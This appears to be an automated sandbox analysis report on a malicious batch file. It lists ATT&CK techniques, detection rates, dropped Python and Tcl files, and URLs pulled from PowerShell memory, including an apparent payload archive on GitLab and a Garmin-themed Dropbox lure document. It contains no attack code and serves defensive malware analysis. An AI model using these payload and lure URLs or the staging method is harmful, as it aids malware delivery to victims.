                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                PowerShell
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                21
                Virtualization/Sandbox Evasion
                LSASS Memory1
                Process Discovery
                Remote Desktop ProtocolData from Removable Media1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Process Injection
                Security Account Manager21
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Obfuscated Files or Information
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture3
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets1
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                hnskdfgjgar22.bat3%VirustotalBrowse
                hnskdfgjgar22.bat8%ReversingLabs
                SourceDetectionScannerLabelLink
                C:\Users\Public\Document\Scripts\normalizer.exe0%ReversingLabs
                C:\Users\Public\Document\Scripts\pip.exe0%ReversingLabs
                C:\Users\Public\Document\Scripts\pip3.12.exe0%ReversingLabs
                C:\Users\Public\Document\Scripts\pip3.exe0%ReversingLabs
                C:\Users\Public\Document\Scripts\pywin32_postinstall.py0%ReversingLabs
                C:\Users\Public\Document\Scripts\pywin32_testall.py0%ReversingLabs
                C:\Users\Public\Document\Scripts\wsdump.exe0%ReversingLabs
                C:\Users\Public\Document\tcl\dde1.4\tcldde14.dll0%ReversingLabs
                C:\Users\Public\Document\tcl\nmake\x86_64-w64-mingw32-nmakehlp.exe0%ReversingLabs
                C:\Users\Public\Document\tcl\reg1.3\tclreg13.dll0%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://uc2080206253754f3f57017a4a9f.dl.dropboxusercontent.com/cd/0/get/Cg3SINC28znh6C8PbwSNM5cVfu9x0%Avira URL Cloudsafe
                https://core.tcl-lang.org/tips/doc/main/tip/477.md)0%Avira URL Cloudsafe
                https://mhammond.github.io/pywin32_installers.html0%Avira URL Cloudsafe
                https://uc2080206253754f3f57017a4a9f.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                http://uc2080206253754f3f57017a4a9f.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                edge-block-www-env.dropbox-dns.com
                162.125.65.15
                truefalse
                  high
                  gitlab.com
                  172.65.251.78
                  truefalse
                    high
                    www-env.dropbox-dns.com
                    162.125.65.18
                    truefalse
                      high
                      www.dropbox.com
                      unknown
                      unknownfalse
                        high
                        uc2080206253754f3f57017a4a9f.dl.dropboxusercontent.com
                        unknown
                        unknownfalse
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          https://gitlab.com/awsr/ga/-/raw/main/FGA2112.zipfalse
                            high
                            https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://gitlab.compowershell.exe, 0000000D.00000002.2818815294.0000028C0C9C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://www.dropbox.com/service_worker.jspowershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://gitlab.com/-/sandbox/;powershell.exe, 0000000D.00000002.2818815294.0000028C0C9C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://paper.dropbox.com/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://crl.microsoftpowershell.exe, 0000000D.00000002.2817840773.0000028C09584000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://www.hellofax.com/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://pal-test.adyen.compowershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.dropbox.compowershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://uc2080206253754f3f57017a4a9f.dl.dropboxusercontent.com/cd/0/get/Cg3SINC28znh6C8PbwSNM5cVfu9xpowershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://paper.dropbox.com/cloud-docs/editpowershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.microsoft.copowershell.exe, 0000000B.00000002.1744666842.000001C965357000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://contoso.com/Licensepowershell.exe, 0000000D.00000002.2864793067.0000028C1B557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://gitlab.com/$Lpowershell.exe, 0000000D.00000002.2869746313.0000028C233DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://snowplow.trx.gitlab.netpowershell.exe, 0000000D.00000002.2818815294.0000028C0C9C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://app.hellosign.com/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://collector.prd-278964.gl-product-analytics.compowershell.exe, 0000000D.00000002.2818815294.0000028C0C9C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.dopowershell.exe, 0000000B.00000002.1744666842.000001C965310000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.hellosign.com/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://instructorledlearning.dropboxbusiness.com/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.dropbox.com/page_success/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://gitlab.compowershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0C9C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.dropbox.com/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.dropbox.com/pithos/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/garmin_campaign_information_for_partners_v15.dopowershell.exe, 0000000B.00000002.1745477599.000001C965430000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://sales.dropboxbusiness.com/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://photos.dropbox.com/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://a.sprig.com/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.docsend.com/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.dropbox.com/encrypted_folder_download/service_worker.jspowershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://gitlab.com/assets/powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_envpowershell.exe, 0000000D.00000002.2818815294.0000028C0C9C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://navi.dropbox.jp/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://contoso.com/powershell.exe, 0000000D.00000002.2864793067.0000028C1B557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.1742213014.000001C95D384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94ECFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1742213014.000001C95D4C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2864793067.0000028C1B414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2864793067.0000028C1B557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.dropbox.com/static/api/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://edge-block-www-env.dropbox-dns.compowershell.exe, 0000000B.00000002.1728314809.000001C94E97C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.dropboxstatic.com/static/powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://apis.google.compowershell.exe, 0000000D.00000002.2818815294.0000028C0C9C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://officeapps-df.live.compowershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://api.login.yahoo.com/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://mhammond.github.io/pywin32_installers.htmlpywin32_postinstall.py.18.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000B.00000002.1728314809.000001C94D311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0B3A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2923869128.00000222CB991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://sentry.gitlab.netpowershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://login.yahoo.com/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://docsend.com/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.dropbox.com/playlist/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.recaptcha.net/powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://onedrive.live.com/pickerpowershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://nuget.org/NuGet.exepowershell.exe, 0000000B.00000002.1742213014.000001C95D384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94ECFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1742213014.000001C95D4C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0CE12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2864793067.0000028C1B414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2864793067.0000028C1B557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://showcase.dropbox.com/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://www.dropbox.com/static/serviceworker/powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.dropbox.compowershell.exe, 0000000B.00000002.1728314809.000001C94DF42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E936000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.2818815294.0000028C0B5D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.2818815294.0000028C0B5D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://go.micropowershell.exe, 0000000B.00000002.1728314809.000001C94DF42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0BFD3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://new-sentry.gitlab.netpowershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://contoso.com/Iconpowershell.exe, 0000000D.00000002.2864793067.0000028C1B557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://gitlab.com/awsr/ga/-/raw/main/fga2112.zippowershell.exe, 0000000D.00000002.2871755757.0000028C23520000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://uc2080206253754f3f57017a4a9f.dl.dropboxusercontent.compowershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://www.dropbox.com/v/s/playlist/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://www-env.dropbox-dns.compowershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.2818815294.0000028C0B5D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://docs.sandbox.google.com/document/fsip/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://docs.sandbox.google.com/spreadsheets/fsip/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://docs.google.com/document/fsip/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://core.tcl-lang.org/tips/doc/main/tip/477.md)targets.vc.18.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://help.dropbox.com/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://docs.google.com/presentation/fsip/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://canny.io/sdk.jspowershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://gitlab.com/-/sandbox/powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://gitlab.com/admin/powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://customers.gitlab.compowershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://gitlab.com/-/speedscope/index.htmlpowershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://selfguidedlearning.dropboxbusiness.com/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.google.com/recaptcha/powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://uc2080206253754f3f57017a4a9f.dl.dropboxusercontent.compowershell.exe, 0000000B.00000002.1728314809.000001C94E97C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://sourcegraph.compowershell.exe, 0000000D.00000002.2818815294.0000028C0C9C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0C9EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://aka.ms/pscore68powershell.exe, 0000000B.00000002.1728314809.000001C94D311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2818815294.0000028C0B3A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2923869128.00000222CB991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://docs.sandbox.google.com/presentation/fsip/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://dl-web.dropbox.com/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://app.hellofax.com/powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://cfl.dropboxstatic.com/static/powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://www.paypal.com/sdk/jspowershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://www.dropbox.com/scl/fi/vhrhih3o3p0hlipowershell.exe, 0000000B.00000002.1745510882.000001C965523000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
